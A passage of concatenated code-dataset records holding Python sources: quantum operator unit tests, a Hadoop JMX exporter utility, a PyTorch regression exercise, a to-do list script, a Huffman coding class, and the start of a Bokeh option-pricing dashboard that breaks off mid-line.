new_operator1 = change_operator_type(operator1, IsingOperator)\n new_operator2 = change_operator_type(operator2, QubitOperator)\n new_operator3 = change_operator_type(operator3, QubitOperator)\n new_operator4 = change_operator_type(operator4, QubitOperator)\n\n # Then\n self.assertEqual(IsingOperator(\"Z0 Z1\", 4.5), new_operator1)\n self.assertEqual(QubitOperator(\"Z0 Z1\", 4.5), new_operator2)\n self.assertEqual(QubitOperator(), new_operator3)\n self.assertEqual(\n QubitOperator(\"Z0\", 0.5) + QubitOperator(\"Z1\", 2.5), new_operator4\n )\n\n def test_get_fermion_number_operator(self):\n # Given\n n_qubits = 4\n n_particles = None\n correct_operator = get_interaction_operator(\n FermionOperator(\n \"\"\"\n 0.0 [] +\n 1.0 [0^ 0] +\n 1.0 [1^ 1] +\n 1.0 [2^ 2] +\n 1.0 [3^ 3]\n \"\"\"\n )\n )\n\n # When\n number_operator = get_fermion_number_operator(n_qubits)\n\n # Then\n self.assertEqual(number_operator, correct_operator)\n\n # Given\n n_qubits = 4\n n_particles = 2\n correct_operator = get_interaction_operator(\n FermionOperator(\n \"\"\"\n -2.0 [] +\n 1.0 [0^ 0] +\n 1.0 [1^ 1] +\n 1.0 [2^ 2] +\n 1.0 [3^ 3]\n \"\"\"\n )\n )\n\n # When\n number_operator = get_fermion_number_operator(n_qubits, n_particles)\n\n # Then\n self.assertEqual(number_operator, correct_operator)\n\n def test_create_circuits_from_qubit_operator(self):\n # Initialize target\n qubits = [Qubit(i) for i in range(0, 2)]\n\n gate_Z0 = Gate(\"Z\", [qubits[0]])\n gate_X1 = Gate(\"X\", [qubits[1]])\n\n gate_Y0 = Gate(\"Y\", [qubits[0]])\n gate_Z1 = Gate(\"Z\", [qubits[1]])\n\n circuit1 = Circuit()\n circuit1.qubits = qubits\n circuit1.gates = [gate_Z0, gate_X1]\n\n circuit2 = Circuit()\n circuit2.qubits = qubits\n circuit2.gates = [gate_Y0, gate_Z1]\n\n target_circuits_list = [circuit1, circuit2]\n\n # Given\n qubit_op = QubitOperator(\"Z0 X1\") + QubitOperator(\"Y0 Z1\")\n\n # When\n pauli_circuits = create_circuits_from_qubit_operator(qubit_op)\n\n # Then\n self.assertEqual(pauli_circuits[0].gates, target_circuits_list[0].gates)\n self.assertEqual(pauli_circuits[1].gates, target_circuits_list[1].gates)\n self.assertEqual(\n str(pauli_circuits[0].qubits), str(target_circuits_list[0].qubits)\n )\n self.assertEqual(\n str(pauli_circuits[1].qubits), str(target_circuits_list[1].qubits)\n )\n\n\nclass TestOtherUtils(unittest.TestCase):\n def test_get_diagonal_component_polynomial_tensor(self):\n fermion_op = FermionOperator(\"0^ 1^ 2^ 0 1 2\", 1.0)\n fermion_op += FermionOperator(\"0^ 1^ 2^ 0 1 3\", 2.0)\n fermion_op += FermionOperator((), 3.0)\n polynomial_tensor = get_polynomial_tensor(fermion_op)\n diagonal_op, remainder_op = get_diagonal_component(polynomial_tensor)\n self.assertTrue((diagonal_op + remainder_op) == polynomial_tensor)\n diagonal_qubit_op = jordan_wigner(get_fermion_operator(diagonal_op))\n remainder_qubit_op = jordan_wigner(get_fermion_operator(remainder_op))\n for term in diagonal_qubit_op.terms:\n for pauli in term:\n self.assertTrue(pauli[1] == \"Z\")\n for term in remainder_qubit_op.terms:\n is_diagonal = True\n for pauli in term:\n if pauli[1] != \"Z\":\n is_diagonal = False\n break\n self.assertFalse(is_diagonal)\n\n def test_get_diagonal_component_interaction_op(self):\n fermion_op = FermionOperator(\"1^ 1\", 0.5)\n fermion_op += FermionOperator(\"2^ 2\", 0.5)\n fermion_op += FermionOperator(\"1^ 2^ 0 3\", 0.5)\n diagonal_op, remainder_op = get_diagonal_component(\n get_interaction_operator(fermion_op)\n )\n self.assertTrue(\n (diagonal_op + remainder_op) == get_interaction_operator(fermion_op)\n )\n diagonal_qubit_op = jordan_wigner(diagonal_op)\n remainder_qubit_op = jordan_wigner(remainder_op)\n for term in diagonal_qubit_op.terms:\n for pauli in term:\n self.assertTrue(pauli[1] == \"Z\")\n is_diagonal = True\n for term in remainder_qubit_op.terms:\n for pauli in term:\n if pauli[1] != \"Z\":\n is_diagonal = False\n break\n self.assertFalse(is_diagonal)\n\n def test_qubitop_to_paulisum_identity_operator(self):\n # Given\n qubit_operator = QubitOperator(\"\", 4)\n\n # When\n paulisum = qubitop_to_paulisum(qubit_operator)\n\n # Then\n self.assertEqual(paulisum.qubits, ())\n self.assertEqual(paulisum, PauliSum() + 4)\n\n def test_qubitop_to_paulisum_z0z1_operator(self):\n # Given\n qubit_operator = QubitOperator(\"Z0 Z1\", -1.5)\n expected_qubits = (GridQubit(0, 0), GridQubit(1, 0))\n expected_paulisum = (\n PauliSum()\n + PauliString(Z.on(expected_qubits[0]))\n * PauliString(Z.on(expected_qubits[1]))\n * -1.5\n )\n\n # When\n paulisum = qubitop_to_paulisum(qubit_operator)\n\n # Then\n self.assertEqual(paulisum.qubits, expected_qubits)\n self.assertEqual(paulisum, expected_paulisum)\n\n def test_qubitop_to_paulisum_setting_qubits(self):\n # Given\n qubit_operator = QubitOperator(\"Z0 Z1\", -1.5)\n expected_qubits = (LineQubit(0), LineQubit(5))\n expected_paulisum = (\n PauliSum()\n + PauliString(Z.on(expected_qubits[0]))\n * PauliString(Z.on(expected_qubits[1]))\n * -1.5\n )\n\n # When\n paulisum = qubitop_to_paulisum(qubit_operator, qubits=expected_qubits)\n\n # Then\n self.assertEqual(paulisum.qubits, expected_qubits)\n self.assertEqual(paulisum, expected_paulisum)\n\n def test_qubitop_to_paulisum_more_terms(self):\n # Given\n qubit_operator = (\n QubitOperator(\"Z0 Z1 Z2\", -1.5)\n + QubitOperator(\"X0\", 2.5)\n + QubitOperator(\"Y1\", 3.5)\n )\n expected_qubits = (LineQubit(0), LineQubit(5), LineQubit(8))\n expected_paulisum = (\n PauliSum()\n + (\n PauliString(Z.on(expected_qubits[0]))\n * PauliString(Z.on(expected_qubits[1]))\n * PauliString(Z.on(expected_qubits[2]))\n * -1.5\n )\n + (PauliString(X.on(expected_qubits[0]) * 2.5))\n + (PauliString(Y.on(expected_qubits[1]) * 3.5))\n )\n\n # When\n paulisum = qubitop_to_paulisum(qubit_operator, qubits=expected_qubits)\n\n # Then\n self.assertEqual(paulisum.qubits, expected_qubits)\n self.assertEqual(paulisum, expected_paulisum)\n\n def test_get_ground_state_rdm_from_qubit_op(self):\n # Given\n n_sites = 2\n U = 5.0\n fhm = fermi_hubbard(\n x_dimension=n_sites,\n y_dimension=1,\n tunneling=1.0,\n coulomb=U,\n chemical_potential=U / 2,\n magnetic_field=0,\n periodic=False,\n spinless=False,\n particle_hole_symmetry=False,\n )\n fhm_qubit = jordan_wigner(fhm)\n fhm_int = get_interaction_operator(fhm)\n e, wf = jw_get_ground_state_at_particle_number(\n get_sparse_operator(fhm), n_sites\n )\n\n # When\n rdm = get_ground_state_rdm_from_qubit_op(\n qubit_operator=fhm_qubit, n_particles=n_sites\n )\n\n # Then\n self.assertAlmostEqual(e, rdm.expectation(fhm_int))\n\n def test_remove_inactive_orbitals(self):\n fermion_ham = load_interaction_operator(\n os.path.dirname(__file__) + \"/../testing/hamiltonian_HeH_plus_STO-3G.json\"\n )\n frozen_ham = remove_inactive_orbitals(fermion_ham, 1, 1)\n self.assertEqual(frozen_ham.one_body_tensor.shape[0], 2)\n\n hf_energy = hf_rdm(1, 1, 2).expectation(fermion_ham)\n self.assertAlmostEqual(frozen_ham.constant, hf_energy)\n","repo_name":"dlasecki/z-quantum-core","sub_path":"src/python/zquantum/core/openfermion/_utils_test.py","file_name":"_utils_test.py","file_ext":"py","file_size_in_byte":15038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"27534688059","text":"#!/usr/bin/env python2\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport argparse\r\nimport logging\r\nimport yaml\r\n\r\n\r\ndef get_module_logger(mod_name):\r\n logger = logging.getLogger(mod_name)\r\n logger.setLevel(logging.DEBUG)\r\n\r\n path = os.path.dirname(os.path.abspath(__file__))\r\n par_path = os.path.dirname(path)\r\n fh = logging.FileHandler(os.path.join(par_path, \"hadoop_jmx_exporter.log\"))\r\n fh.setLevel(logging.INFO)\r\n\r\n sh = logging.StreamHandler()\r\n sh.setLevel(logging.INFO)\r\n\r\n fmt = logging.Formatter(fmt='%(asctime)s %(filename)s[line:%(lineno)d]-[%(levelname)s]: %(message)s')\r\n fh.setFormatter(fmt)\r\n sh.setFormatter(fmt)\r\n\r\n logger.addHandler(fh)\r\n logger.addHandler(sh)\r\n return logger\r\n\r\n\r\nlogger = get_module_logger(__name__)\r\n\r\ndef read_json_file(path_name, file_name):\r\n path = os.path.dirname(os.path.realpath(__file__))\r\n metric_path = os.path.join(path, \"metrics\", path_name)\r\n metric_name = \"{0}.json\".format(file_name)\r\n try:\r\n with open(os.path.join(metric_path, metric_name), 'r') as f:\r\n metrics = yaml.safe_load(f)\r\n return metrics\r\n except Exception as e:\r\n logger.info(\"read metrics json file failed, error msg is: %s\" % e)\r\n return {}\r\n\r\n\r\ndef get_file_list(file_path_name):\r\n path = os.path.dirname(os.path.abspath(__file__))\r\n json_path = os.path.join(path, \"metrics\", file_path_name)\r\n try:\r\n files = os.listdir(json_path)\r\n except OSError:\r\n logger.info(\"No such file or directory: '%s'\" % json_path)\r\n return []\r\n else:\r\n rlt = []\r\n for i in range(len(files)):\r\n rlt.append(files[i].split(\".json\")[0])\r\n return rlt\r\n\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser(description='hadoop jmx metric prometheus exporter')\r\n parser.add_argument('-cluster', required=True, metavar='cluster_name', help='Hadoop cluster name (maybe HA name)')\r\n parser.add_argument('-queue', required=False, metavar='yarn_queue_regexp', help='Regular expression of queue name. default: root.*', default='root.*')\r\n parser.add_argument('-nns', required=False, metavar='namenode_jmx_url', help='Hadoop hdfs namenode jmx metrics URL.', nargs=\"*\")\r\n parser.add_argument('-rms', required=False, metavar='resourcemanager_jmx_url', help='Hadoop resourcemanager metrics jmx URL.', nargs=\"*\")\r\n parser.add_argument('-jns', required=False, metavar='journalnode_jmx_url', help='Hadoop journalnode jmx metrics URL.', nargs=\"*\")\r\n parser.add_argument('-host', required=False, metavar='host', help='Listen on this address. default: 0.0.0.0', default='0.0.0.0')\r\n parser.add_argument('-port', required=False, metavar='port', type=int, help='Listen to this port. default: 6688', default=6688)\r\n return parser.parse_args()\r\n","repo_name":"opsnull/hadoop_jmx_exporter","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"53"} +{"seq_id":"27381204728","text":"# 17. Creating Dataset\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nx = torch.randn(100, 1)*10\r\ny = x\r\nplt.plot(x.numpy(), y.numpy(), 'o')\r\n\r\nx = torch.randn(100, 1)*10\r\ny = x + torch.randn(100, 1)*3\r\nplt.plot(x.numpy(), y.numpy(), 'o')\r\nplt.ylabel('y')\r\nplt.xlabel('x')\r\n\r\nclass LR(nn.Module):\r\n def __init__(self, input_size, output_size):\r\n super().__init__()\r\n self.linear = nn.Linear(input_size, output_size)\r\n def forward(self, x):\r\n pred = self.linear(x)\r\n return pred\r\n\r\ntorch.manual_seed(1)\r\nmodel = LR(1,1)\r\nprint(model)\r\nx = torch.tensor([[1.0], [2.0]])\r\nprint(model.forward(x))\r\n\r\n[w, b] = model.parameters()\r\nprint(w, b)\r\nw1 = w[0][0]\r\nb1 = b[0]\r\nprint(w1, b1)\r\n\r\n[w, b] = model.parameters()\r\nw1 = w[0][0].item()\r\nb1 = b[0].item()\r\nprint(w1, b1)\r\n\r\n[w, b] = model.parameters()\r\ndef get_params():\r\n return (w[0][0].item(), b[0].item())\r\n","repo_name":"ghuijo/PyTorch","sub_path":"LabCodes/17_CreatingDataset_1.py","file_name":"17_CreatingDataset_1.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72354699687","text":"todos = list()\n\ndef create(task):\n todos.append(task)\n\ndef read(index):\n return todos[index]\n\ndef update(index, task):\n todos[index] = task\n\ndef destroy(index):\n todos.pop(index)\n\ndef list_all_tasks():\n index = 0\n for task in todos:\n print(\"{} {}\".format(index, task))\n index += 1\n\ndef mark_completed(index):\n task = todos[index]\n todos[index] = \"√\" + task\n\ndef select(function_code):\n\n if function_code == \"C\":\n input_task = user_input(\"Input task: \")\n create(input_task)\n elif function_code == \"R\":\n task_index = user_input(\"Index number? \")\n read(task_index)\n elif function_code == \"P\":\n list_all_tasks()\n elif function_code == \"Q\":\n return False\n else:\n print(\"Option unknown\")\n return True\n\ndef user_input(prompt):\n user_input = input(prompt)\n return user_input\n\ndef test():\n create(\"task one\")\n create(\"task two\")\n print(read(0))\n print(read(1))\n\n update(0, \"task three\")\n\n destroy(1)\n\n mark_completed(0)\n print(read(0))\n\n user_value = user_input(\"Please enter a value: \")\n print(user_value)\n\n select(\"C\")\n list_all_tasks()\n select(\"R\")\n\ntest()\n\nrunning = True\nwhile running:\n selection = user_input(\n \"Press C to add to list of tasks, R to read from list and P to display list...\"\n )\n running = select(selection)\n","repo_name":"diop/checklist","sub_path":"checklist.py","file_name":"checklist.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28550526097","text":"from HuffmanNode import HuffmanNode\nimport heapq\nfrom collections import Counter\n\n\nclass HuffmanTree(object):\n\t\n\tdef __init__(self, root=None):\n\n\t\tself.root = root\n\t\tself.heap = []\n\t\tself.CODES = {}\n\t\tself.enc_tree = bytearray()\n\n\n\n\tdef char_frequency(self, txt):\n\n\t\t'''\n\t\ttxt(str) -> char frequency (dict)\n\n\t\tThis Function calculates the number of times a character appears in Text\n\t\tand return min heap of char according to their frequency\n\n\t\t'''\n\n\t\tchar_freq = Counter(txt)\n\t\tself.heap = [HuffmanNode(char, freq) for char, freq in char_freq.items()]\n\t\theapq.heapify(self.heap)\n\n\t\treturn self.heap\n\n\n\n\tdef tree_build(self):\n\n\t\t'''\n\t\tBuild tree from Min heap, which is \n\t\tsorted due to character frequency in text\n\t\t'''\n\n\t\twhile (len(self.heap) > 1):\n\n\t\t\tnode1 = heapq.heappop(self.heap)\n\t\t\tnode2 = heapq.heappop(self.heap)\n\n\t\t\tfreq = int(node1.freq) + int(node2.freq)\n\n\t\t\theapq.heappush(self.heap, HuffmanNode(\"IN\", freq, node1, node2))\n\n\t\tself.root = heapq.heappop(self.heap)\n\n\n\n\tdef generate_codes(self, root , code = \"\"):\n\n\t\t'''\n\t\troot(HuffmanNode), code(str) -> UPDATE CODES(dict)\n\n\t\tCreate Huffman Code for each character Recursively\n\t\tBy traversing over the nodes starting from the Root\n\t\tadding \"0\" bit for each left step\n\t\tadding \"1\" bit fro each right step\n\t\t'''\n\n\t\tif root.left is None:\n\t\t\tif code == \"\":\n\t\t\t\tself.CODES[root.char] = 0 \n\t\t\t\treturn\n\t\t\tself.CODES[root.char] = code\n\t\t\treturn\n\n\t\tleft = root.left\n\t\tright = root.right\n\t\t\n\t\tself.generate_codes(left, code+\"0\")\n\t\tself.generate_codes(right, code+\"1\")\n\n\n\n\tdef encoded_tree(self, root=None):\n\n\t\tif root is None:\n\t\t\troot = self.root\n\n\n\t\tif root.left is None:\n\t\t\tself.enc_tree.append(ord(\"0\"))\n\t\t\tself.enc_tree.append(root.char)\n\n\t\telse:\n\n\t\t\tleft = root.left\n\t\t\tright = root.right\n\t\t\t\n\t\t\tself.enc_tree.append(ord(\"1\"))\n\t\t\tself.encoded_tree(left)\n\t\t\tself.encoded_tree(right)\n\n\t\treturn self.enc_tree\n\n\n\n\tdef huffman_coding(self, txt):\n\n\t\tself.char_frequency(txt)\n\t\tself.tree_build()\n\t\tself.generate_codes(self.root)\n\t\tself.encoded_tree()\n\n\t\treturn self.CODES, self.enc_tree\n\n","repo_name":"MMagdys/Huffman-Coding","sub_path":"HuffmanTree.py","file_name":"HuffmanTree.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13479349176","text":"# coding: utf-8\n\n# TO LAUNCH, RUN THIS IN A COMMAND PROMPT/TERMINAL\n# the first 2 lines depend on this file location on your computer (1st is useless if terminal is on the same partition)\n\n# D:/\n# cd Come/Documents/\"Master 203\"/\"Python for finance (PY)\"/Project \n# bokeh serve --show project.py \n\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\nimport bokeh\nimport numpy as np\nimport scipy.stats as stats\nfrom arch import arch_model\n\nimport base64\nfrom io import BytesIO\n\nfrom bokeh.palettes import Spectral4\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import column, row\nfrom bokeh.models import ColumnDataSource, Slider, TextInput, Dropdown, CustomJS, Select, Spinner, Range1d, Toggle, \\\n Title, Panel, Tabs, RadioButtonGroup, Button, CheckboxGroup, CheckboxButtonGroup, DataTable, TableColumn, FileInput, Div, PreText\nfrom bokeh.plotting import figure\n\n\ndef BS_option_complete(nature, S, K, vol_annual, T, r_annual):\n r = r_annual/int(days_in_year_input.value)\n vol = vol_annual/np.sqrt(int(days_in_year_input.value))\n\n d_1 = (np.log(S/K) + (r + vol**2/2)*T)/(vol*np.sqrt(T))\n d_2 = d_1 - vol*np.sqrt(T)\n\n\t# Put and Call prices\n call_price = S*stats.norm.cdf(d_1) - K*np.exp(-r*T)*stats.norm.cdf(d_2)\n put_price = -S*stats.norm.cdf(-d_1) + K*np.exp(-r*T)*stats.norm.cdf(-d_2)\n\n delta_call = stats.norm.cdf(d_1)\n delta_put = stats.norm.cdf(d_1)-1\n\n gamma_call = 1/(vol*S*np.sqrt(T))*stats.norm.pdf(d_1)\n gamma_put = gamma_call\n\n theta_call = -vol*S/(2*np.sqrt(T))*stats.norm.pdf(d_1) - r*K*np.exp(-r*T)*stats.norm.cdf(d_2)\n theta_put = -vol*S/(2*np.sqrt(T))*stats.norm.pdf(d_1) + r*K*np.exp(-r*T)*stats.norm.cdf(-d_2)\n\n vega_call = S*np.sqrt(T)*stats.norm.pdf(d_1)\n vega_put = vega_call\n\n rho_call = T*K*np.exp(-r*T)*stats.norm.cdf(d_2)\n rho_put = -T*K*np.exp(-r*T)*stats.norm.cdf(-d_2)\n\n if(nature == 'call'):\n return (call_price, delta_call, gamma_call, theta_call, vega_call, rho_call)\n return (put_price, delta_put, gamma_put, theta_put, vega_put, rho_put)\n\n\ndef BS_call_complete(S, K, vol, T, r):\n return BS_option_complete('call', S, K, vol, T, r)\n\n\ndef BS_put_complete(S, K, vol, T, r):\n return BS_option_complete('put', S, K, vol, T, r)\n\nassets = {\n 'Call option': {'payoff': (lambda S, K: np.maximum(0, S-K)), 'BS_analytical': BS_call_complete},\n 'Put option': {'payoff': (lambda S, K: np.maximum(0, K-S)), 'BS_analytical': BS_put_complete},\n 'Spot': {'payoff': (lambda S, K: S), 'BS_analytical': (lambda S, K, vol, T, r: (S, 1, 0, 0, 0, 0))},\n }\n\n\ndef BS_path(theta, S0, T, N_points):\n r_annual, vol_annual = theta\n r = r_annual/int(days_in_year_input.value)\n vol = vol_annual/np.sqrt(int(days_in_year_input.value))\n\n res = S0*np.ones(N_points+1)\n res[1:] = S0*np.cumprod(np.exp((r - vol**2/2) * T/N_points + vol * np.random.standard_normal(size=(N_points)) * np.sqrt(T/N_points)))\n return res, vol*np.ones_like(res)\n\n\ndef heston_path(theta_incoming, S0, T, N_points):\n r_annual, v0_annual, kappa, theta_annual, sigma_annual, rho_annual = theta_incoming\n r = r_annual/int(days_in_year_input.value)\n v0 = v0_annual/int(days_in_year_input.value)\n theta = theta_annual/int(days_in_year_input.value)\n sigma = theta_annual/np.sqrt(int(days_in_year_input.value))\n rho = rho_annual/np.sqrt(int(days_in_year_input.value))\n\n res = S0*np.ones(N_points+1)\n vh = np.ones(N_points+1)\n vh[0] = v0\n\n z1 = np.random.standard_normal(size=(N_points))\n\n for t in range(1, N_points+1):\n vh[t] = max(vh[t-1] + kappa*(theta-vh[t-1]) * (T/N_points) + sigma*np.sqrt(vh[t-1]) * np.sqrt(T/N_points)*z1[t-1], 0)\n\n z2 = rho*z1 + np.sqrt(1-rho**2)*np.random.standard_normal(size=(N_points))\n\n for t in range(1, N_points+1):\n res[t] = res[t-1]*np.exp((r - sigma**2/2) * (T/N_points) + np.sqrt(vh[t]) * np.sqrt(T/N_points) * z2[t-1])\n\n return res, np.sqrt(vh)\n\n\ndef GARCH_path(theta, S0, T, N_points):\n (mu, omega, alpha, beta) = theta\n points_per_day = N_points/T\n pmu = mu/points_per_day\n pomega = omega/np.sqrt(points_per_day)\n\n nu = np.random.standard_normal(2*N_points)\n ret = np.zeros(2*N_points)\n sigma = np.zeros(2*N_points)\n for i in range(1, 2*N_points):\n sigma[i] = np.sqrt(pomega + alpha*ret[i-1]**2 + beta*sigma[i-1]**2)\n ret[i] = pmu + sigma[i]*nu[i]\n\n retret = np.zeros(N_points+1)\n retret[1:] = ret[N_points:]\n return S0*np.cumprod(np.exp(retret/100)), sigma[N_points-1:]/100\n\n\ndef GJR_GARCH_path(theta, S0, T, N_points):\n (mu, omega, alpha, beta, gamma) = theta\n points_per_day = N_points/T\n pmu = mu/points_per_day\n pomega = omega/np.sqrt(points_per_day)\n\n nu = np.random.standard_normal(2*N_points)\n ret = np.zeros(2*N_points)\n sigma = np.zeros(2*N_points)\n for i in range(1, 2*N_points):\n sigma[i] = np.sqrt(pomega + alpha*ret[i-1]**2 + beta*sigma[i-1]**2 + gamma*int(ret[i-1] < 0)*ret[i-1]**2)\n ret[i] = pmu + sigma[i]*nu[i]\n\n retret = np.zeros(N_points+1)\n retret[1:] = ret[N_points:]\n return S0*np.cumprod(np.exp(retret/100)), sigma[N_points-1:]/100\n\nmodels = {'Black-Scholes': {'params': [('annual risk-free IR r', -1, 1, 0.001, 0.024), ('annual volatility sigma', 0, 1, 0.001, 0.28)], 'path': BS_path},\n 'GARCH(1,1)': {'params': [('excess log-return bias mu', -1, 1, 0.001, 0.049), ('volatility bias omega', -1, 1, 0.001, 0.026), ('alpha', -1, 1, 0.001, 0.102), ('beta', -1, 1, 0.001, 0.886)], 'path': GARCH_path},\n 'GJR-GARCH(1,1)': {'params': [('excess log-return bias mu', -1, 1, 0.001, 0.002), ('volatility bias omega', -1, 1, 0.001, 0.027), ('alpha', -1, 1, 0.001, 0), ('beta', -1, 1, 0.001, 0.9), ('asymmetry factor gamma', -1, 1, 0.001, 0.169)], 'path': GJR_GARCH_path},\n 'Heston': {'params': [('annual risk-free IR r', -1, 1, 0.001, 0.024), ('v zero', 0, 1, 0.0001, 0.0276), ('kappa', 0, 5, 0.001, 1.200), ('theta', 0, 1, 0.001, 0.0660), ('sigma', 0, 1, 0.0001, 0.5928), ('rho', 0, 1, 0.0001, -0.6589)], 'path': heston_path},\n }\nmodel_names = list(models.keys())\nblocked_recompute = False\nrecompute_request = False\n\n# Set up data\nINITIAL_SPOT = 100\n\nS = np.linspace(0.8*INITIAL_SPOT, 1.2*INITIAL_SPOT, 1001)\ny = np.zeros_like(S)\nsource = ColumnDataSource(data=dict(x=S, curr=y, pnl_matu=y, pnl_int=y))\n\n# Set up plot\nplot = figure(plot_height=600, plot_width=750, title=\"Portfolio valuation\", align=\"start\", x_axis_label='Spot price', y_axis_label='Portfolio total value',\n tools=\"crosshair,pan,save,wheel_zoom\",\n x_range=[0.8*INITIAL_SPOT, 1.2*INITIAL_SPOT], y_range=[-INITIAL_SPOT, INITIAL_SPOT])\n\nplot.line('x', 'curr', source=source, line_width=4, line_alpha=0.8, muted_alpha=0.2, color=Spectral4[0], legend_label=\"Instantaneous value\")\nplot.line('x', 'pnl_int', source=source, line_width=3, line_alpha=1, muted_alpha=0.2, color=Spectral4[1], legend_label=\"Delayed value\")\nplot.line('x', 'pnl_matu', source=source, line_width=3, line_alpha=0.6, muted_alpha=0.2, color=Spectral4[3], legend_label=\"Payoff at maturity\")\n\nplot.title.align = 'center'\nplot.title.text_font_size = '20pt'\nplot.xaxis.axis_label_text_font_size = \"20pt\"\nplot.yaxis.axis_label_text_font_size = \"20pt\"\nplot.legend.location = \"top_left\"\nplot.legend.click_policy = \"mute\"\n\n\ncurr_spot_input = Slider(title=\"Current spot value\", value=INITIAL_SPOT, start=0, end=4*INITIAL_SPOT, step=0.1)\nint_delay_input = Spinner(title=\"Intermediary value delay\", value=1, low=0, high=5*365, step=1, width=140)\n\nleg_toggle_names = []\nqty_input = []\ntype_select = []\nstrike_input = []\nmaturity_input = []\nasset_type_list = list(assets.keys())\nfor leg_nb in range(4):\n leg_toggle_names.append(f\"Leg #{leg_nb}\")\n qty_input.append(Spinner(title=\"Total quantity\", low=-10**6, high=10**6, step=1, value=0, width=140, height=60))\n type_select.append(Select(title=\"Asset type:\", options=asset_type_list, value=asset_type_list[leg_nb % len(asset_type_list)], width=140, height=60))\n strike_input.append(Spinner(title=\"Strike\", low=0, high=1000, step=1, value=INITIAL_SPOT, width=140, height=60))\n maturity_input.append(Spinner(title=\"Time to maturity (days)\", low=0, high=5*365, step=1, value=50, width=140, height=60))\n\nleg_toggle = CheckboxButtonGroup(labels=leg_toggle_names, active=[0], sizing_mode=\"scale_width\")\n\nask_recompute = Button(label=\"Launch computation!\", button_type=\"success\", width=200)\nask_recompute.disabled = True\ninstant_recompute = CheckboxGroup(labels=[\"Automatically recompute\"], active=[0], width=180)\nrecompute_delay = Slider(title=\"Recompute delay (ms)\", value=500, start=0, end=1000, step=10, width=200)\n\ndisplay_data = dict(param=['Fair price at inception', 'Delta', 'Gamma', 'Theta', 'Vega', 'Rho'],\n th_value=[0 for i in range(6)],\n emp_value=[0 for i in range(6)])\ndisplay_source = ColumnDataSource(data=display_data)\n\ndisplay_columns = [\n TableColumn(field=\"param\", title=\"\"),\n TableColumn(field=\"th_value\", title=\"Theoritical value\"),\n TableColumn(field=\"emp_value\", title=\"Computed value\"),\n ]\ndisplay_data_table = DataTable(source=display_source, columns=display_columns, width=600, height=200)\n\n\ndef update_UI(attrname, old, new):\n redraw_UI()\n\n\ndef update_UI_mono(new):\n redraw_UI()\n\n\ndef redraw_UI():\n delay_red_flag = False\n T_delay = int_delay_input.value\n for leg_nb in range(4):\n if(leg_nb not in leg_toggle.active):\n qty_input[leg_nb].disabled = True\n type_select[leg_nb].disabled = True\n strike_input[leg_nb].disabled = True\n maturity_input[leg_nb].disabled = True\n else:\n qty_input[leg_nb].disabled = False\n type_select[leg_nb].disabled = False\n strike_input[leg_nb].disabled = False\n maturity_input[leg_nb].disabled = False\n asset_type = type_select[leg_nb].value\n if(asset_type in [\"Spot\"]):\n strike_input[leg_nb].visible = False\n maturity_input[leg_nb].visible = False\n else:\n strike_input[leg_nb].visible = True\n maturity_input[leg_nb].visible = True\n if(leg_nb in leg_toggle.active):\n T = maturity_input[leg_nb].value\n delay_red_flag += (T < T_delay)\n\n if(delay_red_flag):\n int_delay_input.background = 'red'\n else:\n int_delay_input.background = 'white'\n\n if(instant_recompute.active):\n ask_recompute.disabled = True\n recompute_delay.disabled = False\n else:\n ask_recompute.disabled = False\n recompute_delay.disabled = True\n\n\ndef recompute_asked(new):\n recompute()\n\n\ndef param_changed(attrname, old, new):\n global blocked_recompute\n global recompute_request\n if(instant_recompute.active and not blocked_recompute and not recompute_request):\n recompute_request = True\n curdoc().add_timeout_callback(recompute, recompute_delay.value)\n\n\ndef param_changed_mono(new):\n global blocked_recompute\n global recompute_request\n if(instant_recompute.active and not blocked_recompute and not recompute_request):\n recompute_request = True\n curdoc().add_timeout_callback(recompute, recompute_delay.value)\n\n\ndef Monte_Carlo(S0, T, N_Tries):\n res = np.zeros((N_Tries, T+1))\n for i in range(N_Tries):\n res[i, :] = models[model_names[model_selection_input.active]]['path']([x.value for x in models[model_names[model_selection_input.active]]['params_inputs']], S0, T, T)[0]\n return res\n\n\ndef Adaptive_Monte_Carlo(S0, T, err, N_max_tries):\n res = []\n tries = 0\n flag = True\n while((flag and tries < N_max_tries) or tries < 10):\n tries += 1\n simu_path = models[model_names[model_selection_input.active]]['path']([x.value for x in models[model_names[model_selection_input.active]]['params_inputs']], S0, T, T)[0]\n res.append(simu_path)\n flag = ((np.std(res[:, -1])/S0) > err)\n return np.array(res)\n\n\ndef recompute():\n global blocked_recompute\n blocked_recompute = False\n\n global recompute_request\n recompute_request = False\n\n if(max([abs(qty_input[leg_nb].value) for leg_nb in range(4)]) <= 0):\n return\n\n # Generate the new curve\n S0 = curr_spot_input.value\n T_delay = int_delay_input.value\n S = np.concatenate([np.linspace(0, 0.8*S0, 20), np.linspace(0.8*S0, 1.2*S0, 51), np.linspace(1.2*S0, 2*S0, 20)])\n if(models[model_names[model_selection_input.active]]['resolution_method'].value == 'Analytical (recommended)'):\n S = np.linspace(0, 2*S0, 1001)\n close_index = np.argmin(abs(S-S0))\n maturity_value = np.zeros_like(S)\n current_value = np.zeros_like(S)\n int_value = np.zeros_like(S)\n\n th_greeks = np.zeros(6)\n emp_greeks = np.zeros(6)\n\n if(models[model_names[model_selection_input.active]]['resolution_method'].value == 'Analytical (recommended)'):\n r, vol = [x.value for x in models[model_names[0]]['params_inputs']]\n\n for leg_nb in range(4):\n Q = qty_input[leg_nb].value\n if(leg_nb in leg_toggle.active and Q != 0):\n T = maturity_input[leg_nb].value\n K = strike_input[leg_nb].value\n asset_type = type_select[leg_nb].value\n\n T_int = max(T-T_delay, 0)\n unit_val = assets[asset_type][\"BS_analytical\"](S, K, 